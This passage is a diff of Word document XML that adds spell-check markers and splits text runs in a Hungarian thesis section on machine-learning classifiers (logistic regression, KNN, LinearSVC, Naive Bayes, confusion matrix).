+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dependent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9324,6 +10458,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc71471971"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9333,9 +10468,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Logistic Regression</w:t>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9467,18 +10627,34 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -9563,12 +10739,28 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10118,7 +11310,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>logisztikai szigmoid függvény</w:t>
+        <w:t xml:space="preserve">logisztikai </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szigmoid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függvény</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10294,8 +11500,45 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10851,7 +12094,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
+        <w:t xml:space="preserve">A távolság megtalálásának leggyakoribb módja az </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10863,7 +12113,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>szi távolság</w:t>
+        <w:t>szi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11310,7 +12567,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
+        <w:t xml:space="preserve">n-dimenziós </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklidészi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság képlete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11349,6 +12620,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="17" w:name="_Toc71471973"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11369,8 +12641,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ear </w:t>
-      </w:r>
+        <w:t>ear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11380,8 +12653,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Support Vector</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11391,8 +12665,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11402,8 +12677,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11413,8 +12689,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>LinearSVC</w:t>
-      </w:r>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11424,6 +12701,41 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>LinearSVC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
@@ -11454,14 +12766,29 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">upport </w:t>
-      </w:r>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>upport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11472,8 +12799,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ector </w:t>
-      </w:r>
+        <w:t>ector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11486,6 +12821,7 @@
         </w:rPr>
         <w:t>achine</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11522,6 +12858,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11540,6 +12877,7 @@
         </w:rPr>
         <w:t>C</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11562,7 +12900,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(hyperplane) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hyperplane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12408,6 +13760,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Gaussian </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12417,9 +13770,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Naive Bayes</w:t>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="18"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12441,7 +13819,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
+        <w:t xml:space="preserve">A Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12453,7 +13845,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
+        <w:t xml:space="preserve"> csoportja, amely a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-tételen alapul</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12477,7 +13883,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
+        <w:t xml:space="preserve">Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12925,11 +14345,33 @@
         </w:rPr>
         <w:t xml:space="preserve">s ábra: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive Bayes tétele</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétele</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12955,17 +14397,33 @@
         </w:rPr>
         <w:t xml:space="preserve">Háromféle </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztályozó létezik</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13021,17 +14479,33 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes-t használják</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használják</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13045,17 +14519,33 @@
         </w:rPr>
         <w:t xml:space="preserve">kkor </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Naive </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes tétel</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétel</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13316,12 +14806,28 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ensemble Methods</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ensemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Methods</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13492,7 +14998,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
+        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hiperparaméter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13547,6 +15067,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13556,8 +15077,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Confusion </w:t>
-      </w:r>
+        <w:t>Confusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13567,8 +15089,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13578,9 +15101,21 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>atrix</w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13658,6 +15193,7 @@
         </w:rPr>
         <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13668,8 +15204,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion </w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13686,7 +15230,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">trix </w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13722,6 +15273,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13734,12 +15286,14 @@
         </w:rPr>
         <w:t>onfusion</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13750,7 +15304,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13815,11 +15376,33 @@
         </w:rPr>
         <w:t>igaz pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
